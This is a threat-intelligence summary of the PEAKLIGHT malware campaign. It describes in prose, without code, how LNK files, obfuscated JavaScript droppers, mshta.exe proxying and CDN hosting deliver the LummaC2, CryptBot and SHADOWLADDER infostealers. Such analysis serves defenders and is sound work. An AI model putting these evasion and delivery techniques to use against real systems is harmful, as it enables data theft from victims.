A memory-only JavaScript dropper, delivered via a Microsoft Shortcut File, initiates a chain of attacks by downloading a PowerShell script named PEAKLIGHT, which in turn fetches and executes malicious payloads like LUMMAC2, SHADOWLADDER, and CRYPTBOT.
These payloads, classified as malware-as-a-service infostealers, compromise compromised systems to steal sensitive data, where the attackers utilize a content delivery network (CDN) to host the malicious components, enhancing their persistence and evading detection.
Investigators discovered a malware campaign using ZIP archives with filenames resembling popular movies that contained a malicious LNK file disguised as a media icon.
The LNK file likely redirected users to another LNK file hosted on a specific IP address and containing various malicious commands, though the exact nature of the commands wasn’t immediately identified.
A malicious LNK file exploited the forfiles.exe utility to search for the win.ini file in the C:\Windows directory. Upon finding a match, it executed a PowerShell script that fetched a second-stage payload from a remote URL.
The payload was then executed using mshta.exe. As a decoy, a seemingly benign video file was played on Windows Media Player to mask the malicious activity.
The attackers employed a malicious LNK file to execute PowerShell commands that discreetly launched mshta.exe, a system binary proxy, to run malicious code retrieved from a remote server.
They used wildcards (*) in the registry path to target Mshta and the dot sourcing operator to execute the retrieved script, and they also leveraged a reputable content delivery network (CDN) to host their malicious payloads, bypassing security filters and enhancing their evasion capabilities.
An analyzed HTML file contained a JavaScript dropper disguised with decimal-encoded ASCII characters, whose decoding revealed a script employing a function to decode further obfuscated data.
It contained a command to be executed with elevated privileges through an ActiveX object. Variations of this dropper were also found, using hex-encoded or Base64-encoded payloads within strings.
These payloads involved launching PowerShell hidden and unrestricted, then converting the encoded data (hex or Base64) into a byte array, decrypting it (AES with different modes and keys), and finally executing the revealed PowerShell code.
Peaklight, a malicious PowerShell downloader, targets Windows machines and comes in two variations. Both check for specific ZIP files (L1/L2.zip or K1/K2.zip) in designated folders (AppData or ProgramData).
If they are missing, they download the ZIPs from remote servers and extract them. Variation 1 executes the first alphabetically sorted executable found inside, while Variation 2 runs the first encountered one.
Variation 1 also fetches an image and potentially communicates with a server, while Variation 2 focuses solely on ZIP downloads and execution. Both utilize obfuscated functions for string manipulation, downloading, and file operations.
According to Mandiant, the downloader delivers three variants of payloads through archives. Variant 1 includes Cryptbot infostealer (Setup.exe) and SHADOWLADDER malware (LiteSkinUtils.dll, bentonite.cfg).
Variant 2 utilizes SHADOWLADDER (touggie.txt, Aaaa.exe, WCLDll.dll) and CRYPTBOT.AUTOIT (erefgojgbu), while Variant 3 leverages LummaC.V2 infostealer (WebView2Loader.dll, oqnhustu) and compromised legitimate executables (hgjke.exe) for side-loading malware (Ufa.au3).
Peaklight, a PowerShell-based downloader, downloads malicious payloads from CDNs, which checks for local archives and downloads them if not found, by using various obfuscation techniques and system binary proxies to evade detection.